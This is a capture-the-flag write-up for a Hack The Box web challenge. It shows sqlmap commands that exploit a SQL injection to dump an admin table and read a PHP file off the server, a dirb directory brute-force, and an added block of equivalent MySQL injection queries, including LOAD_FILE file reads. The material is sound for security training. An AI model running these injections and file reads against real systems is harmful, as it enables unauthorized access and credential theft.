HTB WEB freelancer
1 min read · Nov 18, 2019
From the page source we found a link to portfolio.php?id=3. A numeric id parameter that goes straight into a database lookup is a classic SQL injection candidate, so let's try it with sqlmap:
sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" --tables
The parameter is injectable, and among the enumerated tables is one called safeadmin. Dump it:
sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" -T safeadmin --dump
The dump contains an admin password hash, but it does not crack, so the credentials are a dead end and we need another way in.
The source also references a directory /administrat/. Brute-force it for .php files with dirb:
dirb http://docker.hackthebox.eu:30596/administrat/ -X .php
This turns up /administrat/panel.php. Rather than trying to log in, we use the injection we already have to read that file straight off the server's disk. sqlmap's --file-read works through the injection point, so -u must still point at the injectable URL (portfolio.php?id=3), not at the page we want to read:
sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" --file-read=/var/www/html/administrat/panel.php
sqlmap saves the retrieved file under its output directory and prints the local path; cat that file. The flag is at the bottom of panel.php.
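For anyone who wants to see what sqlmap is actually doing behind the three switches used in this walkthrough, here are the equivalent queries as an added example (not from the original writeup). It assumes a MySQL backend, which the page does not state explicitly but which the LOAD_FILE-based file read implies; the table name and file path are the ones found above.

```sql
-- Added example, not part of the original writeup. Assumes MySQL: the page
-- never names the DBMS, but --file-read on this target relies on LOAD_FILE,
-- which is MySQL-specific.

-- Manual sanity check before reaching for sqlmap. Inject these after id=3 in
-- portfolio.php?id= ; if the two responses differ, the value is reaching the
-- query unescaped.
--   portfolio.php?id=3 AND 1=1
--   portfolio.php?id=3 AND 1=2

-- --tables : enumerate the tables in the current database
SELECT table_name
FROM information_schema.tables
WHERE table_schema = DATABASE();

-- -T safeadmin --dump : discover the columns, then pull every row
SELECT column_name, data_type
FROM information_schema.columns
WHERE table_schema = DATABASE()
  AND table_name = 'safeadmin';

SELECT * FROM safeadmin;

-- --file-read : read a file from the web server's disk through the injection.
-- This only works if the database user has the FILE privilege and
-- secure_file_priv does not restrict the path; sqlmap typically wraps the
-- result in HEX() so binary or multi-line content survives the trip back.
SELECT HEX(LOAD_FILE('/var/www/html/administrat/panel.php'));
```

If the LOAD_FILE query returns NULL, check the FILE privilege and secure_file_priv first: a NULL there is a permission problem, not a sign the injection has stopped working.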